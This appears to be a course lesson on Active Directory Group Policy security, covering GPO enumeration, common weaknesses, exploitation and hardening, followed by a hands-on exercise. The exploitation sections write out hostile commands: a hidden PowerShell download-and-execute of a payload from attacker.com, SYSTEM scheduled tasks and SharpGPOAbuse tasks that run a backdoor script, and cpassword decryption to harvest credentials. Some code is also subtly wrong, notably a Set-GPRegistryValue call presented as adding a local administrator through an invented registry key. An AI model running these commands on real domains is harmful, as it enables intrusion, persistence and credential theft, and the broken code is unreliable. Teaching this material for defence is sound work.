๐ Lesson 3: Group Policy Security
Understanding Group Policy security, enumeration techniques, and exploitation methods
๐ Learning Objectives
By the end of this lesson, you will be able to:
- Understand Group Policy architecture and components
- Master GPO enumeration and analysis techniques
- Identify Group Policy security vulnerabilities
- Execute Group Policy exploitation attacks
- Analyze Group Policy Objects for sensitive information
- Implement Group Policy security countermeasures
๐๏ธ Group Policy Architecture
What is Group Policy?
Group Policy is a feature of Microsoft Windows that provides centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. It allows administrators to define security policies, software installation, and system configurations across multiple computers.
๐ Group Policy Key Components:
- Group Policy Objects (GPOs): Containers for policy settings
- Group Policy Container (GPC): AD objects storing GPO metadata
- Group Policy Template (GPT): File system storage for policy files
- Sysvol: Shared folder containing policy templates
Group Policy Structure
GPO Storage Locations:
Active Directory Domain
โโโ CN=Policies,CN=System,DC=domain,DC=com
โ โโโ CN={GPO-GUID}
โ โโโ CN=Machine (Computer Configuration)
โ โโโ CN=User (User Configuration)
โ
File System (Sysvol)
โโโ \\domain.com\SYSVOL\domain.com\Policies\
โโโ {GPO-GUID}/
โโโ MACHINE/
โ โโโ Registry.pol
โ โโโ Scripts/
โ โโโ Preferences/
โโโ USER/
โโโ Registry.pol
โโโ Scripts/
โโโ Preferences/
Group Policy Processing
๐ Policy Processing Order
- Local Group Policy - Computer and user local policies
- Site Policies - Site-linked GPOs
- Domain Policies - Domain-linked GPOs
- OU Policies - OU-linked GPOs (nested OUs processed from parent to child)
โก Policy Processing Modes
- Merge Mode: Combine all applicable policies
- Replace Mode: Replace previous policy settings
- No Override: Prevent child policies from overriding
- Block Inheritance: Prevent parent policies from applying
๐ Group Policy Enumeration
GPO Discovery Techniques
๐ ๏ธ PowerShell Enumeration
Native PowerShell commands for GPO enumeration
Basic GPO Enumeration:
# Get all GPOs in domain
Get-GPO -All | Select-Object DisplayName, Id, CreationTime
# Get GPOs linked to specific OU
Get-GPO -Domain "domain.com" -Server "dc.domain.com"
# Get GPO details
Get-GPO -Name "Default Domain Policy" | Get-GPOReport -ReportType XML
๐ง LDAP Enumeration
Direct LDAP queries for GPO information
LDAP Queries:
# Find all GPOs
ldapsearch -H ldap://domain.com -D "user@domain.com" -W -b "CN=Policies,CN=System,DC=domain,DC=com" "(objectClass=groupPolicyContainer)"
# Get GPO details
ldapsearch -H ldap://domain.com -D "user@domain.com" -W -b "CN={GPO-GUID},CN=Policies,CN=System,DC=domain,DC=com"
๐ SYSVOL Enumeration
Direct file system enumeration of SYSVOL
SYSVOL Access:
# List GPO directories
ls \\domain.com\SYSVOL\domain.com\Policies\
# Access GPO files
cat \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\MACHINE\Registry.pol
# Check for scripts
ls \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\MACHINE\Scripts\
Automated GPO Enumeration Tools
๐ PowerView
PowerShell-based GPO enumeration
Key Functions:
- Get-NetGPO - Enumerate GPOs
- Get-NetGPOGroup - Get GPO groups
- Get-NetGPOLocalGroup - Get local groups
- Get-ObjectAcl - Get GPO permissions
๐ฏ Grouper2
Automated GPO analysis and reporting
Key Features:
- Automated GPO enumeration
- Security policy analysis
- HTML report generation
- Vulnerability identification
๐ SharpGPOAbuse
C# tool for GPO abuse and exploitation
Key Capabilities:
- GPO enumeration
- Immediate task creation
- Scheduled task abuse
- Local admin addition
โ ๏ธ Group Policy Security Vulnerabilities
Common GPO Attack Vectors
๐ Weak GPO Permissions
Insufficient access controls on Group Policy Objects
Permission Issues:
- Authenticated Users with Edit rights
- Domain Users with Modify permissions
- Everyone group with full control
- Missing deny permissions
Impact:
- GPO modification and abuse
- Local admin privilege escalation
- Persistent backdoor installation
- Domain-wide configuration changes
๐ Script Deployment
Malicious script deployment through GPOs
Script Types:
- Startup/shutdown scripts
- Logon/logoff scripts
- Scheduled task scripts
- Immediate task scripts
Impact:
- Code execution on target systems
- Persistence mechanisms
- Lateral movement facilitation
- Data exfiltration
๐ Credential Storage
Plaintext credentials stored in GPOs
Credential Storage Locations:
- Group Policy Preferences
- Local user creation
- Service account configuration
- Registry key modifications
Impact:
- Credential theft and reuse
- Privilege escalation
- Lateral movement
- Domain compromise
๐ง Registry Modifications
Malicious registry changes through GPOs
Registry Abuses:
- Auto-logon credentials
- Security policy bypasses
- Service configuration changes
- System hardening removal
Impact:
- Security control bypass
- System configuration changes
- Persistence mechanisms
- Defense evasion
๐ฏ Group Policy Exploitation Techniques
GPO Abuse Methods
๐ Local Admin Addition
Adding users to local administrators group via GPO
Attack Steps:
- Identify GPOs with weak permissions
- Modify GPO to add user to local admins
- Wait for policy refresh or force update
- Access target systems with admin rights
PowerShell Implementation:
# Add user to local administrators
New-GPO -Name "Malicious Policy"
Set-GPRegistryValue -Name "Malicious Policy" -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Groups" -ValueName "S-1-5-32-544" -Value "attacker"
๐ Malicious Script Deployment
Deploying backdoors through GPO scripts
Attack Steps:
- Create malicious script payload
- Upload script to SYSVOL
- Configure GPO to execute script
- Target specific OUs or computers
Script Example:
# Malicious PowerShell script
powershell.exe -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
# Scheduled task creation
schtasks /create /tn "Update" /tr "powershell.exe -ep bypass -f \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Scripts\Startup\backdoor.ps1" /sc onstart /ru SYSTEM
๐ Credential Harvesting
Extracting stored credentials from GPOs
Attack Steps:
- Enumerate GPOs for credential storage
- Access Group Policy Preferences files
- Decrypt stored credentials
- Use credentials for lateral movement
Credential Extraction:
# Find GPOs with stored credentials
Get-GPO -All | Get-GPOReport -ReportType XML | Select-String "cpassword"
# Decrypt cpassword using gpp-decrypt
gpp-decrypt "cpassword_value"
# Extract from registry files
Get-Content "\\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Registry.pol"
โก Immediate Task Abuse
Creating immediate tasks for code execution
Attack Steps:
- Create GPO with immediate task
- Configure task to run malicious command
- Link GPO to target OU
- Trigger policy update
Immediate Task Creation:
# Using SharpGPOAbuse
SharpGPOAbuse.exe --AddImmediateTask --TaskName "Update" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c powershell.exe -ep bypass -f \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Scripts\backdoor.ps1" --GPOName "Malicious Policy"
๐ก๏ธ Group Policy Security Countermeasures
Defense Strategies
๐ Permission Hardening
Implementation:
- Remove Authenticated Users from GPO permissions
- Grant Edit rights only to authorized administrators
- Implement least privilege access
- Use security groups for GPO management
- Regular permission audits
๐ Monitoring & Logging
Implementation:
- Enable GPO change auditing
- Monitor SYSVOL file changes
- Track GPO linking and unlinking
- Alert on suspicious GPO modifications
- Implement SIEM integration
๐ง Script Security
Implementation:
- Digitally sign all GPO scripts
- Implement script execution policies
- Use AppLocker for script control
- Regular script content reviews
- Secure script storage locations
๐ซ Credential Protection
Implementation:
- Avoid storing credentials in GPOs
- Use Group Managed Service Accounts
- Implement credential encryption
- Regular credential audits
- Use secure credential management solutions
Security Configuration
๐ GPO Security Settings
# Remove Authenticated Users from GPO permissions
Set-GPPermission -Name "GPO Name" -TargetName "Authenticated Users" -TargetType Group -PermissionLevel None
# Grant specific permissions to admin group
Set-GPPermission -Name "GPO Name" -TargetName "GPO Admins" -TargetType Group -PermissionLevel GpoEdit
# Enable GPO change auditing
auditpol /set /subcategory:"DS Access" /success:enable /failure:enable
๐ก๏ธ SYSVOL Security
# Set SYSVOL permissions
icacls "\\domain.com\SYSVOL" /grant "Domain Admins:(OI)(CI)F" /T
icacls "\\domain.com\SYSVOL" /grant "Enterprise Admins:(OI)(CI)F" /T
icacls "\\domain.com\SYSVOL" /remove "Authenticated Users"
# Enable file system auditing
auditpol /set /subcategory:"File System" /success:enable /failure:enable
๐งช Hands-On Exercise
Exercise: Group Policy Security Assessment
Objective: Perform comprehensive GPO enumeration, identify security vulnerabilities, and demonstrate exploitation techniques.
๐ Steps:
-
GPO Enumeration
Enumerate all Group Policy Objects:
# PowerShell enumeration Get-GPO -All | Select-Object DisplayName, Id, CreationTime, ModificationTime # Get GPO details Get-GPO -Name "Default Domain Policy" | Get-GPOReport -ReportType XML # Check GPO permissions Get-GPPermission -Name "Default Domain Policy" -All -
SYSVOL Enumeration
Examine SYSVOL for sensitive information:
# List all GPO directories ls \\domain.com\SYSVOL\domain.com\Policies\ # Check for scripts Get-ChildItem \\domain.com\SYSVOL\domain.com\Policies\*\Machine\Scripts\ -Recurse # Search for credentials Get-ChildItem \\domain.com\SYSVOL\domain.com\Policies\*\Machine\ -Recurse | Select-String "cpassword" -
Vulnerability Assessment
Identify GPO security issues:
# Check for weak permissions Get-GPPermission -Name "Default Domain Policy" -All | Where-Object {$_.Trustee.Name -eq "Authenticated Users"} # Look for stored credentials Get-GPO -All | Get-GPOReport -ReportType XML | Select-String "cpassword" # Check for immediate tasks Get-GPO -All | Get-GPOReport -ReportType XML | Select-String "ImmediateTask" -
Exploitation Demonstration
Demonstrate GPO abuse techniques:
# Create malicious GPO (if permissions allow) New-GPO -Name "Security Update" # Add user to local administrators Set-GPRegistryValue -Name "Security Update" -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Groups" -ValueName "S-1-5-32-544" -Value "attacker" # Link GPO to OU New-GPLink -Name "Security Update" -Target "OU=Computers,DC=domain,DC=com" -
Credential Extraction
Extract stored credentials from GPOs:
# Use gpp-decrypt for credential extraction gpp-decrypt "cpassword_here" # Parse XML files for credentials [xml]$xml = Get-Content "\\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml" $xml.Groups.User.Properties | Select-Object Username, NewName, cpassword
๐ Deliverables:
- GPO enumeration report
- Vulnerability assessment findings
- Extracted credentials (if found)
- Exploitation demonstration results
- Security recommendations